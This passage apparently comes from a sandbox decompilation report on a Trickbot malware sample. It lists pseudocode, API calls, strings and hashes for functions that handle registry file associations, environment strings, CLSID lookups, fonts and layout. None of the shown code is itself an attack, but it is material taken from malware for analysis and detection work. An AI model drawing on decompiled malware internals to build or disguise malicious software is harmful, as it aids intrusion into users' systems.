						 *(_t168 - 0x18) = _t85;
						 *(_t168 - 0x14) = _t85;
						 *(_t168 - 0x1c) = _t85;
						_push(5);
						_push(_t168 - 0x14);
						 *(_t168 - 4) = 4;
						if( *((intOrPtr*)( *_t165 + 0x64))() != 0 &&  *((intOrPtr*)( *(_t168 - 0x14) - 8)) != 0) {
							_t93 =  *((intOrPtr*)( *_t165 + 0x64))(_t168 - 0x1c, 6);
							_t181 = _t93;
							if(_t93 == 0) {
								E00417FB5(_t168 - 0x1c, _t168, _t168 - 0x14);
							}
							E004155CC(_t168 - 0x10, "%s\\DefaultIcon",  *(_t168 - 0x14));
							_t173 = _t171 + 0xc;
							E00433344(_t181,  *(_t168 - 0x10));
							_push(0);
							_push(_t168 - 0x10);
							if( *((intOrPtr*)( *_t165 + 0x64))() == 0) {
								L9:
								_push("ddeexec");
								E004155CC(_t168 - 0x10, "%s\\shell\\open\\%s",  *(_t168 - 0x14));
								E00433344(_t183,  *(_t168 - 0x10));
								_push("ddeexec");
								E004155CC(_t168 - 0x10, "%s\\shell\\print\\%s",  *(_t168 - 0x14));
								E00433344(_t183,  *(_t168 - 0x10));
								_push("ddeexec");
								E004155CC(_t168 - 0x10, "%s\\shell\\printto\\%s",  *(_t168 - 0x14));
								_t173 = _t173 + 0x30;
								E00433344(_t183,  *(_t168 - 0x10));
							} else {
								_t130 =  *(_t168 - 0x10);
								_t183 =  *((intOrPtr*)(_t130 - 8));
								if( *((intOrPtr*)(_t130 - 8)) == 0) {
									goto L9;
								}
							}
							E004155CC(_t168 - 0x10, "%s\\shell\\open\\%s",  *(_t168 - 0x14));
							E00433344(_t183,  *(_t168 - 0x10));
							E004155CC(_t168 - 0x10, "%s\\shell\\print\\%s",  *(_t168 - 0x14));
							E00433344(_t183,  *(_t168 - 0x10));
							E004155CC(_t168 - 0x10, "%s\\shell\\printto\\%s",  *(_t168 - 0x14));
							_t171 = _t173 + 0x30;
							E00433344(_t183,  *(_t168 - 0x10));
							 *((intOrPtr*)( *_t165 + 0x64))(_t168 - 0x18, 4, _t160, _t160, _t160);
							_t119 =  *(_t168 - 0x18);
							_t184 =  *((intOrPtr*)(_t119 - 8));
							if( *((intOrPtr*)(_t119 - 8)) != 0) {
								 *(_t168 - 0x24) = 0x208;
								_t167 = RegQueryValueA(0x80000000, _t119, E004181F7(_t168 - 0x10, _t168, 0x208), _t168 - 0x24);
								E00418246(_t168 - 0x10, _t184, 0xffffffff);
								if(_t167 != 0) {
									L14:
									E004155CC(_t168 - 0x10, "%s\\ShellNew",  *(_t168 - 0x18));
									_t171 = _t171 + 0xc;
									E00433344(_t187,  *(_t168 - 0x10));
									E00433344(_t187,  *(_t168 - 0x18));
								} else {
									_t128 =  *(_t168 - 0x10);
									if( *((intOrPtr*)( *(_t168 - 0x10) - 8)) == _t167) {
										goto L14;
									} else {
										_t129 = E0040504F(_t128,  *(_t168 - 0x14));
										_t187 = _t129;
										if(_t129 == 0) {
											goto L14;
										}
									}
								}
							}
						}
						 *(_t168 - 4) = 3;
						E00417EC8(_t168 - 0x1c);
						 *(_t168 - 4) = 2;
						E00417EC8(_t168 - 0x14);
						 *(_t168 - 4) = 1;
						E00417EC8(_t168 - 0x18);
					} while (_t134 != 0);
				}
				 *(_t168 - 4) =  *(_t168 - 4) & 0x00000000;
				E00417EC8(_t168 - 0x10);
				 *(_t168 - 4) =  *(_t168 - 4) | 0xffffffff;
				_t83 = E00417EC8(_t168 - 0x20);
				 *[fs:0x0] =  *((intOrPtr*)(_t168 - 0xc));
				return _t83;
			}

0x00431f3b
0x004334b0
0x004334b5
0x004334b8
0x004334bf
0x004334c1
0x004334c4
0x004334c8
0x004334cb
0x004334dc
0x004334e1
0x004334e6
0x004334ed
0x004334f2
0x004334f2
0x004334f4
0x004334f6
0x004334f9
0x004334fe
0x00433501
0x00433504
0x0043350c
0x0043350e
0x00433511
0x0043351a
0x00433537
0x0043353a
0x0043353c
0x00433545
0x00433545
0x00433556
0x0043355b
0x00433561
0x0043356b
0x0043356d
0x00433575
0x00433580
0x00433580
0x00433591
0x0043359c
0x004335a1
0x004335b2
0x004335bd
0x004335c2
0x004335d3
0x004335d8
0x004335de
0x00433577
0x00433577
0x0043357a
0x0043357e
0x00000000
0x00000000
0x0043357e
0x004335f0
0x004335fb
0x0043360d
0x00433618
0x0043362a
0x0043362f
0x00433635
0x00433644
0x00433647
0x0043364a
0x0043364e
0x0043365b
0x00433679
0x0043367b
0x00433682
0x0043369b
0x004336a7
0x004336ac
0x004336b2
0x004336ba
0x00433684
0x00433684
0x0043368a
0x00000000
0x0043368c
0x00433690
0x00433696
0x00433699
0x00000000
0x00000000
0x00433699
0x0043368a
0x00433682
0x0043364e
0x004336c2
0x004336c6
0x004336ce
0x004336d2
0x004336da
0x004336de
0x004336e3
0x004336eb
0x004336ec
0x004336f3
0x004336f8
0x004336ff
0x00433709
0x00433711

APIs

__EH_prolog.LIBCMT ref: 004334B0

Part of subcall function 0041DA3F: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0041DA59
Part of subcall function 0041DA3F: GetShortPathNameA.KERNEL32(?,00000000,00000104), ref: 0041DA71

RegQueryValueA.ADVAPI32(80000000,?,00000000,00000208), ref: 0043366E

Strings

%s\shell\printto\%s, xrefs: 004335CD, 00433624
%s\shell\open\%s, xrefs: 0043358B, 004335EA
command, xrefs: 004334ED, 004335E3, 00433600, 0043361D
%s\shell\print\%s, xrefs: 004335AC, 00433607
%s\DefaultIcon, xrefs: 00433550
%s\ShellNew, xrefs: 004336A1
ddeexec, xrefs: 00433580, 004335A1, 004335C2

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Name$FileH_prologModulePathQueryShortValue
String ID: %s\DefaultIcon$%s\ShellNew$%s\shell\open\%s$%s\shell\print\%s$%s\shell\printto\%s$command$ddeexec
API String ID: 365916388-556638191
Opcode ID: d173c4286ba12df0bf125d78ad2e4b67d5874ad7ccaf50a260126a686e732af9
Instruction ID: d390e32400513a69a9b0881177cd2a7855cbf6ce13e271ea9eae0ee46f2cc8ea
Opcode Fuzzy Hash: d173c4286ba12df0bf125d78ad2e4b67d5874ad7ccaf50a260126a686e732af9
Instruction Fuzzy Hash: BA716C7190021AABDF11EFE5CD46AEEBBB9AF08705F10046EF511B3291DB785A44CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004091B0, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004091B0() {
				int _v4;
				int _v8;
				intOrPtr _t7;
				CHAR* _t9;
				WCHAR* _t17;
				int _t20;
				char* _t24;
				int _t32;
				CHAR* _t36;
				WCHAR* _t38;
				void* _t39;
				int _t42;

				_t7 =  *0x44b944; // 0x1
				_t32 = 0;
				_t38 = 0;
				_t36 = 0;
				if(_t7 != 0) {
					if(_t7 != 1) {
						if(_t7 != 2) {
							L27:
							return 0;
						}
						L18:
						if(_t36 != _t32) {
							L20:
							_t9 = _t36;
							if( *_t36 == _t32) {
								L23:
								_t41 = _t9 - _t36 + 1;
								_t39 = E0040511B(_t9 - _t36 + 1);
								if(_t39 != _t32) {
									E00405400(_t39, _t36, _t41);
								} else {
									_t39 = 0;
								}
								FreeEnvironmentStringsA(_t36);
								return _t39;
							} else {
								goto L21;
							}
							do {
								do {
									L21:
									_t9 =  &(_t9[1]);
								} while ( *_t9 != _t32);
								_t9 =  &(_t9[1]);
							} while ( *_t9 != _t32);
							goto L23;
						}
						_t36 = GetEnvironmentStrings();
						if(_t36 == _t32) {
							goto L27;
						}
						goto L20;
					}
					L6:
					if(_t38 != _t32) {
						L8:
						_t17 = _t38;
						if( *_t38 == _t32) {
							L11:
							_t20 = (_t17 - _t38 >> 1) + 1;
							_v4 = _t20;
							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);
							if(_t42 != _t32) {
								_t24 = E0040511B(_t42);
								_v8 = _t24;
								if(_t24 != _t32) {
									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {
										_t4 =  &_v8; // 0x40523d
										E004053B8( *_t4);
										_v8 = _t32;
									}
									_t6 =  &_v8; // 0x40523d
									_t32 =  *_t6;
								}
							}
							FreeEnvironmentStringsW(_t38);
							return _t32;
						} else {
							goto L9;
						}
						do {
							do {
								L9:
								_t17 =  &(_t17[1]);
							} while ( *_t17 != _t32);
							_t17 =  &(_t17[1]);
						} while ( *_t17 != _t32);
						goto L11;
					}
					_t38 = GetEnvironmentStringsW();
					if(_t38 == _t32) {
						goto L27;
					}
					goto L8;
				}
				_t38 = GetEnvironmentStringsW();
				if(_t38 == 0) {
					_t36 = GetEnvironmentStrings();
					if(_t36 == 0) {
						goto L27;
					}
					 *0x44b944 = 2;
					goto L18;
				}
				 *0x44b944 = 1;
				goto L6;
			}

0x004091b2
0x004091c1
0x004091c3
0x004091c5
0x004091c9
0x00409201
0x0040928b
0x004092d9
0x00000000
0x004092d9
0x0040928d
0x0040928f
0x0040929d
0x0040929f
0x004092a1
0x004092ad
0x004092b0
0x004092b8
0x004092bd
0x004092c6
0x004092bf
0x004092bf
0x004092bf
0x004092cf
0x00000000
0x00000000
0x00000000
0x00000000
0x004092a3
0x004092a3
0x004092a3
0x004092a3
0x004092a4
0x004092a8
0x004092a9
0x00000000
0x004092a3
0x00409297
0x0040929b
0x00000000
0x00000000
0x00000000
0x0040929b
0x00409207
0x00409209
0x00409217
0x0040921a
0x0040921c
0x0040922c
0x00409238
0x0040923f
0x00409245
0x00409249
0x0040924c
0x00409254
0x00409258
0x00409269
0x0040926b
0x0040926f
0x00409275
0x00409275
0x00409279
0x00409279
0x00409279
0x00409258
0x0040927e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040921e
0x0040921e
0x0040921e
0x0040921f
0x00409220
0x00409226
0x00409227
0x00000000
0x0040921e
0x0040920d
0x00409211
0x00000000
0x00000000
0x00000000
0x00409211
0x004091cd
0x004091d1
0x004091e5
0x004091e9
0x00000000
0x00000000
0x004091ef
0x00000000
0x004091ef
0x004091d3
0x00000000

APIs

GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0040523D), ref: 004091CB
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0040523D), ref: 004091DF
GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0040523D), ref: 0040920B
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0040523D), ref: 00409243
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0040523D), ref: 00409265
FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,0040523D), ref: 0040927E
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0040523D), ref: 00409291
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004092CF

Strings

=R@, xrefs: 00409279, 0040926B

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide
String ID: =R@
API String ID: 1823725401-765710743
Opcode ID: c0bd49d0e153b6461becdb98ce4de4cf4f08ef4301ec3e3f50a862544bd5774d
Instruction ID: 7e9765a9e3b7d132753b7977d9a1b269c0ef5939c90707fe0a2d63200c5401f3
Opcode Fuzzy Hash: c0bd49d0e153b6461becdb98ce4de4cf4f08ef4301ec3e3f50a862544bd5774d
Instruction Fuzzy Hash: 2331CAB25092157FEB207B745C8483BB69CE6453547150DBFF942F32C2E6794C41866D

Uniqueness

Uniqueness Score: -1.00%

Function 0041D5C2, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 67
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041D5C2(void* _a4, intOrPtr _a8) {
				void* _v8;
				void* _v12;
				int _v16;
				int _v20;
				void* __ebp;
				long _t28;
				char* _t30;
				long _t32;
				signed int _t37;
				void* _t47;

				_t37 = 0;
				_v12 = 0;
				if(RegOpenKeyA(0x80000000, "CLSID",  &_v12) == 0) {
					_v8 = 0;
					if(RegOpenKeyA(_v12, _a4,  &_v8) == 0) {
						_a4 = 0;
						_t28 = RegOpenKeyA(_v8, "InProcServer32",  &_a4);
						_t50 = _t28;
						if(_t28 == 0) {
							_t30 = E004181F7(_a8, _t47, 0x104);
							_v16 = 0x104;
							_t32 = RegQueryValueExA(_a4, 0x449350, 0,  &_v20, _t30,  &_v16);
							E00418246(_a8, _t50, 0xffffffff);
							_t37 = 0 | _t32 == 0x00000000;
							RegCloseKey(_a4);
						}
						RegCloseKey(_v8);
					}
					RegCloseKey(_v12);
				}
				return _t37;
			}

0x0041d5d4
0x0041d5e0
0x0041d5e7
0x0041d5ee
0x0041d601
0x0041d606
0x0041d612
0x0041d614
0x0041d616
0x0041d621
0x0041d629
0x0041d63b
0x0041d648
0x0041d657
0x0041d659
0x0041d659
0x0041d65e
0x0041d65e
0x0041d663
0x0041d665
0x0041d66b

APIs

RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 0041D5E3
RegOpenKeyA.ADVAPI32(?,?,00000001), ref: 0041D5F7
RegOpenKeyA.ADVAPI32(00000001,InProcServer32,?), ref: 0041D612
RegQueryValueExA.ADVAPI32(?,00449350,00000000,?,00000000,?,00000104), ref: 0041D63B

Part of subcall function 00418246: lstrlenA.KERNEL32(00000000,00000100,0041C6F4,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,?,?), ref: 00418259

RegCloseKey.ADVAPI32(?,000000FF), ref: 0041D659
RegCloseKey.ADVAPI32(00000001), ref: 0041D65E
RegCloseKey.ADVAPI32(?), ref: 0041D663

Strings

InProcServer32, xrefs: 0041D60A
CLSID, xrefs: 0041D5D6

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CloseOpen$QueryValuelstrlen
String ID: CLSID$InProcServer32
API String ID: 1568031711-323508013
Opcode ID: 9e374ce3edbf7e8dd3553cd402a526af76ddfd4d29e037a88c58b91dacf66982
Instruction ID: 015957d6291dc9e98ce5539027297fd1a0eb0d51e1877ccc92742f519abc29cc
Opcode Fuzzy Hash: 9e374ce3edbf7e8dd3553cd402a526af76ddfd4d29e037a88c58b91dacf66982
Instruction Fuzzy Hash: EF113A72D0021CBBDB10AFA5CC81DDEBB79EF48394B10406AF914A3250D6749E50DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00430A66, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00430A66() {
				int _t1;
				int _t7;
				struct HDC__* _t12;
				void* _t18;

				_t1 =  *0x4478fc; // 0xffffffff
				if(_t1 == 0xffffffff) {
					_t12 = GetDC(0);
					_t18 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
					if(_t18 != 0) {
						_t18 = SelectObject(_t12, _t18);
					}
					GetCharWidthA(_t12, 0x36, 0x36, 0x4478fc);
					if(_t18 != 0) {
						SelectObject(_t12, _t18);
						DeleteObject(_t18);
					}
					ReleaseDC(0, _t12);
					_t7 =  *0x4478fc; // 0xffffffff
					return _t7;
				}
				return _t1;
			}

0x00430a66
0x00430a6e
0x00430a95
0x00430aaa
0x00430aae
0x00430ab4
0x00430ab4
0x00430ac0
0x00430ac8
0x00430acc
0x00430acf
0x00430acf
0x00430ad7
0x00430add
0x00000000
0x00430ae5
0x00430ae6

APIs

GetDC.USER32(00000000), ref: 00430A77
GetSystemMetrics.USER32(00000048), ref: 00430A97
CreateFontA.GDI32(00000000,?,?,?,?,00430BFF,?,?,?,?,?,?,?), ref: 00430A9E
SelectObject.GDI32(00000000,00000000), ref: 00430AB2
GetCharWidthA.GDI32(00000000,00000036,00000036,004478FC), ref: 00430AC0
SelectObject.GDI32(00000000,00000000), ref: 00430ACC
DeleteObject.GDI32(00000000), ref: 00430ACF
ReleaseDC.USER32(00000000,00000000), ref: 00430AD7

Strings

Marlett, xrefs: 00430A7D

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
String ID: Marlett
API String ID: 1397664628-3688754224
Opcode ID: d5e5477c3dff95d3c89747f714b27051cefc33f4dec30f0d15f1dff9f5d6b730
Instruction ID: bd86b06498bf5005314426fb292b08be16bcad8ca1308705f795db1032c99aad
Opcode Fuzzy Hash: d5e5477c3dff95d3c89747f714b27051cefc33f4dec30f0d15f1dff9f5d6b730
Instruction Fuzzy Hash: 6E01A231A003507BD7316B776C8DDAB3E3CDBD7FA1F001629F621A219186A94C01C678

Uniqueness

Uniqueness Score: -1.00%

Function 00403D70, Relevance: 15.2, APIs: 10, Instructions: 227
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00403D70(void* __ecx) {
				long _v4;
				struct tagRECT _v20;
				struct tagRECT _v36;
				struct tagRECT _v52;
				struct tagRECT _v68;
				struct tagRECT _v84;
				struct tagRECT _v100;
				struct tagRECT _v116;
				struct tagRECT _v132;
				intOrPtr _v136;
				struct tagRECT _v152;
				signed int _t115;
				long* _t116;
				long _t143;
				void* _t155;
				intOrPtr _t162;
				int _t164;
				signed int _t166;
				intOrPtr _t167;
				void* _t186;
				intOrPtr _t187;
				intOrPtr _t195;
				long _t215;
				intOrPtr _t221;
				void* _t228;
				long* _t229;

				_t228 = __ecx;
				_t115 = GetSystemMetrics(5);
				_t229 = _t228 + 4;
				_t164 = _t115 * 8 - _t115;
				_t116 = _t229;
				_v152.left =  *_t116;
				_v152.top = _t116[1];
				_v152.right = _t116[2];
				_v152.bottom = _t116[3];
				InflateRect( &_v152, _t164,  ~_t164);
				_v52.top = _v152.top;
				_v52.left = _v152.left;
				_v52.right =  *_t229;
				_v52.bottom =  *((intOrPtr*)(_t228 + 8));
				OffsetRect( &_v52, 4, 0xfffffffc);
				 *0x449660 = _v52.left;
				 *0x449668 = _v52.right;
				 *0x449664 = _v52.top;
				 *0x44966c = _v52.bottom;
				_v84.top = _v152.top;
				_v84.left =  *(_t228 + 0xc);
				_v84.right = _v152.right;
				_v84.bottom =  *((intOrPtr*)(_t228 + 8));
				OffsetRect( &_v84, 0xfffffffc, 0xfffffffc);
				 *0x449670 = _v84.left;
				 *0x449674 = _v84.top;
				 *0x449678 = _v84.right;
				 *0x44967c = _v84.bottom;
				_v132.left =  *(_t228 + 0xc);
				_v132.top =  *((intOrPtr*)(_t228 + 0x10));
				_v132.right = _v152.right;
				_v132.bottom = _v152.bottom;
				OffsetRect( &_v132, 0xfffffffc, 4);
				 *0x449680 = _v132.left;
				 *0x449684 = _v132.top;
				 *0x449688 = _v132.right;
				 *0x44968c = _v132.bottom;
				_v116.top =  *((intOrPtr*)(_t228 + 0x10));
				_v116.left = _v152.left;
				_v116.right =  *_t229;
				_v116.bottom = _v152.bottom;
				OffsetRect( &_v116, 4, 4);
				 *0x449694 = _v116.top;
				_t215 = _v152.left;
				 *0x449698 = _v116.right;
				 *0x449690 = _v116.left;
				asm("cdq");
				 *0x44969c = _v116.bottom;
				_t186 = (_v152.right - _t215 - _t215 >> 1) + _v152.left;
				asm("cdq");
				_t166 = _t164 - _t215 >> 1;
				_t187 = _t186 + _t166;
				_t143 = _t186 - _t166;
				_v136 = _t187;
				_v100.right = _t187;
				_v4 = _t143;
				_v100.left = _t143;
				_v100.top = _v152.top;
				_v100.bottom =  *((intOrPtr*)(_t228 + 8));
				OffsetRect( &_v100, 0, 0xfffffffc);
				 *0x4496a0 = _v100.left;
				 *0x4496a4 = _v100.top;
				 *0x4496a8 = _v100.right;
				 *0x4496ac = _v100.bottom;
				_v68.top =  *((intOrPtr*)(_t228 + 0x10));
				_v68.left = _v4;
				_v68.right = _v136;
				_v68.bottom = _v152.bottom;
				OffsetRect( &_v68, 0, 4);
				 *0x4496c4 = _v68.top;
				 *0x4496c8 = _v68.right;
				_t193 = _v152.top;
				 *0x4496c0 = _v68.left;
				_t221 = _v68.bottom;
				 *0x4496cc = _t221;
				asm("cdq");
				_t155 = (_v152.bottom - _v152.top - _t221 >> 1) + _t193;
				_t195 = _t155 - _t166;
				_t167 = _t166 + _t155;
				_v136 = _t195;
				_v36.top = _t195;
				_v36.left =  *(_t228 + 0xc);
				_v36.right = _v152.right;
				_v36.bottom = _t167;
				OffsetRect( &_v36, 0xfffffffc, 0);
				 *0x4496b4 = _v36.top;
				 *0x4496b0 = _v36.left;
				_v20.left = _v152.left;
				 *0x4496b8 = _v36.right;
				 *0x4496bc = _v36.bottom;
				_v20.top = _v136;
				_v20.right =  *_t229;
				_v20.bottom = _t167;
				OffsetRect( &_v20, 4, 0);
				_t162 = _v20.top;
				 *0x4496d0 = _v20.left;
				 *0x4496d4 = _t162;
				 *0x4496d8 = _v20.right;
				 *0x4496dc = _v20.bottom;
				return _t162;
			}

0x00403d7a
0x00403d7e
0x00403d8b
0x00403d8e
0x00403d90
0x00403d94
0x00403d9b
0x00403da2
0x00403db4
0x00403db8
0x00403dcf
0x00403dd3
0x00403de3
0x00403dea
0x00403df1
0x00403dff
0x00403e0c
0x00403e15
0x00403e1b
0x00403e28
0x00403e2c
0x00403e3c
0x00403e40
0x00403e44
0x00403e52
0x00403e5c
0x00403e62
0x00403e67
0x00403e77
0x00403e7f
0x00403e8b
0x00403e8f
0x00403e94
0x00403ea2
0x00403eac
0x00403eb6
0x00403ebb
0x00403ec7
0x00403ecb
0x00403edc
0x00403ee0
0x00403ee4
0x00403ef2
0x00403ef8
0x00403efc
0x00403f05
0x00403f11
0x00403f14
0x00403f22
0x00403f26
0x00403f31
0x00403f33
0x00403f35
0x00403f37
0x00403f3b
0x00403f3f
0x00403f46
0x00403f56
0x00403f5a
0x00403f5e
0x00403f6c
0x00403f76
0x00403f82
0x00403f88
0x00403f95
0x00403f99
0x00403faa
0x00403fae
0x00403fb2
0x00403fc0
0x00403fc9
0x00403fcf
0x00403fd3
0x00403fd9
0x00403fdf
0x00403fe7
0x00403ff3
0x00403ffa
0x00403ffc
0x00404001
0x00404005
0x00404010
0x00404017
0x0040401e
0x00404025
0x0040403c
0x00404046
0x00404052
0x00404059
0x00404063
0x00404077
0x0040407e
0x00404085
0x0040408c
0x00404095
0x004040a3
0x004040b3
0x004040b8
0x004040be
0x004040cb

APIs

GetSystemMetrics.USER32(00000005), ref: 00403D7E
InflateRect.USER32(?), ref: 00403DB8
OffsetRect.USER32(?,00000004,000000FC), ref: 00403DF1
OffsetRect.USER32(?,000000FC,000000FC), ref: 00403E44
OffsetRect.USER32(?,000000FC,00000004), ref: 00403E94
OffsetRect.USER32(?,00000004,00000004), ref: 00403EE4
OffsetRect.USER32(?,00000000,000000FC), ref: 00403F5E
OffsetRect.USER32(?,00000000,00000004), ref: 00403FB2
OffsetRect.USER32(?,000000FC,00000000), ref: 00404025
OffsetRect.USER32(?,00000004,00000000), ref: 0040408C

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Rect$Offset$InflateMetricsSystem
String ID:
API String ID: 2878613481-0
Opcode ID: 7fc4fd259142b5792a3f9717946d8a1acf5cbb86edd7298868a2b4bd696d8ac4
Instruction ID: 4bf22297b9a8a012ab263455615a11098a29f09f43bb9424803d7087da0d7f7f
Opcode Fuzzy Hash: 7fc4fd259142b5792a3f9717946d8a1acf5cbb86edd7298868a2b4bd696d8ac4
Instruction Fuzzy Hash: 53B193B86097408FD358CF29D980A5BFBE1BBC9310F118A2EF99983360D770A805CF56

Uniqueness

Uniqueness Score: -1.00%

Function 0043682F, Relevance: 15.2, APIs: 10, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E0043682F(void* __ecx, long* _a4, int* _a8, int _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr* _a28, intOrPtr _a32, char* _a36, int* _a40, signed int* _a44) {
				intOrPtr _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v24;
				CHAR* _v28;
				int _v32;
				signed int _v36;
				signed int _v40;
				struct tagSIZE _v48;
				struct tagPOINT _v56;
				struct tagSIZE _v64;
				struct tagTEXTMETRICA _v120;
				struct tagTEXTMETRICA _v176;
				signed int _t119;
				signed int _t120;
				int _t121;
				signed int* _t125;
				long* _t127;
				signed int _t131;
				signed char _t132;
				int _t140;
				signed char* _t142;
				int _t144;
				int _t149;
				int _t153;
				signed int _t156;
				signed short _t159;
				signed char* _t167;
				int* _t170;
				signed int _t174;
				int _t175;
				int _t185;
				signed int _t187;
				int _t189;
				int _t190;
				void* _t191;
				int* _t193;

				_t191 = __ecx;
				GetTextMetricsA( *(__ecx + 8),  &_v120);
				GetTextMetricsA( *(__ecx + 4),  &_v176);
				GetTextExtentPoint32A( *(__ecx + 8), 0x43d910, 1,  &_v48);
				_t119 = GetTextAlign( *(__ecx + 8));
				_v40 = _t119;
				_t120 = _t119 & 0x00000001;
				_v36 = _t120;
				if(_t120 == 0) {
					_t170 = _a8;
				} else {
					GetCurrentPositionEx( *(__ecx + 4),  &_v56);
					_t170 = _a8;
					 *_t170 = _v56.x;
				}
				_t121 =  *_t170;
				_t193 = _a40;
				_t167 = _a12;
				_t185 = 0;
				_v28 = _t167;
				_v32 = _t121;
				_a12 = _t121;
				_v12 = 0;
				_v20 = 0;
				if(_a20 != 0) {
					if(_a24 != 1) {
						_t159 = GetTabbedTextExtentA( *(_t191 + 8), 0x43d90c, 1, 0, 0);
						_t170 = _a8;
						_t185 = 0;
						_v20 = _t159 & 0x0000ffff;
					} else {
						_v20 =  *_a28;
					}
				}
				_v8 = _t185;
				if( *_a16 <= _t185) {
					L31:
					_t187 = _v40 & 0x00000006;
					_v48.cx = _a12 -  *_t170;
					_t125 = _a44;
					 *_t125 =  *_t125 & 0x00000000;
					if(_t187 != 0) {
						if(_t187 != 6) {
							if(_t187 == 2) {
								 *_t125 = _v12;
							}
							L38:
							if(_v36 != 0) {
								MoveToEx( *(_t191 + 4),  *_t170, _v56.y, 0);
							}
							 *_a16 = _t193 - _a40 >> 2;
							_t127 = _a4;
							 *_t127 = _v48.cx;
							_t127[1] = _v48.cy;
							return _t127;
						}
						asm("cdq");
						_t131 = _v12 - _t187 >> 1;
						L33:
						 *_t170 =  *_t170 + _t131;
						goto L38;
					}
					_t131 = _v12;
					goto L33;
				} else {
					while(1) {
						_t132 =  *_t167;
						_t174 = 0 | _t132 == _v120.tmBreakChar;
						_v24 = _t174;
						if(_t174 != _t185 || _a20 != _t185 && _t132 == 9) {
							GetTextExtentPoint32A( *(_t191 + 8), _v28, _v24 - _v28 + _t167,  &_v64);
							_t140 = _v64.cx - _v120.tmOverhang + _v32;
							if(_v24 == 0) {
								_t140 = E004367FB(_t140, _a24, _a28, _a32, _v20);
							}
							_t175 = _t140;
							if(_t193 != _a40) {
								 *((intOrPtr*)(_t193 - 4)) =  *((intOrPtr*)(_t193 - 4)) + _t175 - _a12;
							} else {
								_v12 = _v12 + _t175 - _a12;
							}
							_a12 = _t140;
							_v32 = _t140;
							_v28 =  &(_t167[1]);
						} else {
							_t144 = _t132 & 0x000000ff;
